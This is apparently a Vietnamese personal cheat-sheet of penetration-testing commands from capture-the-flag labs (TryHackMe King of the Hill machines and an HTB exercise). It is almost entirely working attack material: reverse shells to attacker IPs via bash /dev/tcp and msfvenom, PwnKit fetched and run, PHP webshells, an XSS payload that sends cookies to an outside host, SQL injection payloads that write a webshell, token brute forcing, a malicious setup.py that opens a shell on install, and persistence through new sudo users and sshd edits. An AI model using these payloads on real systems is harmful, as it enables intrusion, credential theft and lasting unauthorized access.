King of the hill

# King of the hill ## [Shrek machine](https://www.youtube.com/watch?v=QsimLG1oZjo) - Target sẽ là : 10.10.237.146 - `ping -c 3 target` -> test service - `nmap -sC -sV -oN map.txt target` -> recon lấy dir và port - `echo .... | base64 -d` -> decode base64 - `chmod 600 id_rsa` -> `ssh -i id_rsa username@target` -> kết nối ssh khi biết private key - `skipper --dirhttp target | bash` -> recoce - `curl target:port` -> check port ```code= sudo service openvpn restart sudo pkill openvpn sudo service networking restart sudo openvpn user.ovpn ``` => open lại vpn ```code= find / -perm -u=s -type f 2>/dev/null nano binary-escalation -> tìm chỗ để leo thang user/bin/gdb -> leo thang https://gtfobins.github.io/ ./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit id ``` => leo thang bằng gdb khi đã RCE được ```code= wget http://Your-ip python3 -m http.server ``` => lấy file đưa vào máy nạn nhân dugnf wget ```code= uname -a echo "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=yourIP LPORT=yourPort -f elf > shell.elf" > backdoor msfconsole use multi/handler set lhost tun0 set option exploit set PAYLOAD php/meterpreter/reverse_tcp run ``` => Reverse shell bằng metasploit - `wget http://Your-ip/shell.elf` - `chmod + shell.elf` - `./shell.elf done &` - `cd /` -> `cd root` -> `cat root.txt` -> chua leo thang - `find / | grep flag.txt` - `which python3` -> creat reverse shell - `echo '<?php system($_GET["cmd"]); ?> ' > shell.php` - `nc lnvp 9001` - ![image](https://hackmd.io/_uploads/rk-hiMTRlg.png) -> paste `?cmd=` - `https://github.com/ly4k/PwnKit` -> `curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit` -> `chmod +x PwnKit` -> `./PwnKit` -> RCE - `adduser ams` - `passwd ams` - `vim /etc/sudoers` - ![image](https://hackmd.io/_uploads/SJmaCG6Rlg.png) - `sudo su` - `vim /etc/ssh/sshd_config` - ![image](https://hackmd.io/_uploads/r1jNJ7pClg.png) - ![image](https://hackmd.io/_uploads/BJ5DkQ6Axg.png) - `systemctl restart sshd` - ![image](https://hackmd.io/_uploads/rk9hyQTCgg.png) - ![image](https://hackmd.io/_uploads/SkgdjlCRex.png) - shrek : ssh - geo : 9999 - ![image](https://hackmd.io/_uploads/rk0XseAAle.png) - Donkey : reverse shell python -> pwnkit lên root ## [Fireworks machine](https://www.youtube.com/watch?v=1ypi7mqCfXo) - `threader 3000` -> quét cổng - `ftp target` -> `get abc.txt` ```code= ssh2john id_rsa > forjohn j forjohn john forjohn --show ``` => crak passwd để ```code= nano ^R^X reset; sh 1>&0 2>&0 ``` => [Tạo shell mới khi nó bị giới hạn](https://gtfobins.github.io/gtfobins/nano/) => lấy được shell `sudo -l` -> thấy NoPasswd với `usr/bin/nmap` ```code= TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF ``` ```code= echo 'h00dy' > king.txt chattr +i king.txt ``` => đặt thuộc tính không thể thay đổi kể cả root cho đến khi thuộc tính bị gỡ ```code= whatweb http://12.3.3.4 searchsploit kết quả vừa tìm ``` ```code= sqlmap -r sql.txt --dbs --threads 10 -> tim payload sqlmap -r sql.txt -D mgs_db --tables --threads 10 --batch -> tim table sqlmap -r sql.txt -D mgs_db -T users --dump --threads 10 --batch -> usser ``` [crakking passwd](https://crackstation.net/) - looking url liKE `user/list` -> `etc/passwd` -> `usr/bin/fireshell` ```code= docker ps docker exec -it id bash ``` [vào đây để tìm POC](https://www.vicarius.io/vsociety/) [CVE trong bài này](https://www.vicarius.io/vsociety/posts/xwiki-rce-cve-2024-31982) ```code= /bin/bash -c '/bin/bash -i >& /dev/tcp/atkker-ip/1337 0>&1' chmodx void.sh up 80 nc -lnvp 1337 python3 xwiki_rce.py -u "http:...." -c 'curl atk_ip/void.sh -o void.sh' python3 xwiki_rce.py -u "http:...." -c 'bash void.sh' ``` => cắm shell ```code= chmod 600 id_rsa ssh -i id_rsa thomas@target ``` ```code= find . -name 'id_rsa' 2>/dev/null ``` ```code= su david ``` ```code= shell id nc -lnvp 1337 shell bash -c 'bash -i >& /dev/tcp/atk_ip/1337 0>&1' ``` ## Trilocor robotic - HTB - XSS - `<img src=x onerror="this.src='http://10.10.14.3:8000/cookie?c='+document.cookie">` - ` python -m http.server ` - ` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://www.trilocor.local/ -H 'Host: FUZZ.trilocor.local' -t 20 -fw 5194,1 ` - Upload file - Elementor v3.7.7 - `action=elementor_library_direct_actions&_nonce=444650fd84&library_action=import_template&fileData=PD9waHAgZWNobyBpc3NldCgkX0dFVFsnY21kJ10pID8gc2hlbGxfZXhlYygkX0dFVFsnY21kJ10pIDogbnVsbDsgPz4K&fileName=/../payload.php ` - `http://admin.trilocor.local/wp-content/uploads/elementor/tmp/payload.php?cmd=cat%20/etc/passwd ` - SQLi - `http://www.trilocor.local:8088/index.php?username=hr-smith'+OR+'1'='1&password=hr-smit ` - LFi - Đổi method - `ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://www.trilocor.local:8088/dashboard.php -X POST -d "language=FUZZ" -H "Content-Type: application/x-www form-urlencoded" -H "Cookie: PHPSESSID=f0u8vq154fpnlj8e8pchhq2d57" -fs 3018,3035 ` ```code! http://www.trilocor.local:8088/index.php?username=hr-smith'+OR+'<?=`ls`?>'!='1&password=hr-smitth ``` - - `....// ....// ....//var/lib/php/sessions/sess_<session_id> ` -> đọc ls - Weak passwd reset token - `seq -w 0000 9999 > tokens.txt ` - ` ffuf -w tokens.txt -request req.txt -request-proto http -u http://www.trilocor.local:8080/reset.php -fs 4568 ` - SQLi - `sqlmap -u "http://www.trilocor.local:8080/resumes.php?search=r.batty" -cookie="PHPSESSID=5oo04rk4eovu3k3e30pu7qop0u" --batch --level=5 --risk=3` - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'1','2','3','4','5','6 ` - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,variable_name,variable_value,NULL,'3'+FROM+information_schema.global_variables+where+variable_name%3d"secure_file_priv"--+` -> đọc để xem có giới hạn gì không - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'IceKing+Write+File',NULL,'1','2',NULL,''+INTO+OUTFILE+'/tmp/test.txt ` -> viết file - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,LOAD_FILE('/tmp/test.txt')%3b--+ ` -> đọc file - ` ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u "http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,LOAD_FILE('FUZZ')%3b-+" -H "Cookie: PHPSESSID=5oo04rk4eovu3k3e30pu7qop0u" -fs 3176 ` - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,(SELECT+LOAD_FILE('/etc/apache2/httpd.conf'))%3b--+ ` - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'<%3fphp+system($_REQUEST[0])%3b+%3f>',NULL,'1','2',NULL,''+INTO+OUTFILE+'/var/www/public/shell.php ` -> up webshell - SSRF ```code= mkdir evilpkg cd evilpkg from setuptools import setup import os os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'") setup( name="evilpkg", version="0.1", description="Malicious package", packages=["evilpkg"], ) echo "" > __init__.py cd .. tar -czf evilpkg-0.1.tar.gz * [us-academy-exams-1]-[10.10.14.22]-[htb-ac-852867@htb-3aeykq8h7q]-[~] [*]$ nc -lvnp 4444 listening on [any] 4444 ... ``` - ![image](https://hackmd.io/_uploads/rJuPHSJ1Wx.png) - `nc -lvnp 4444` - `sudo ufw status verbose` -> các cổng được cho phép mở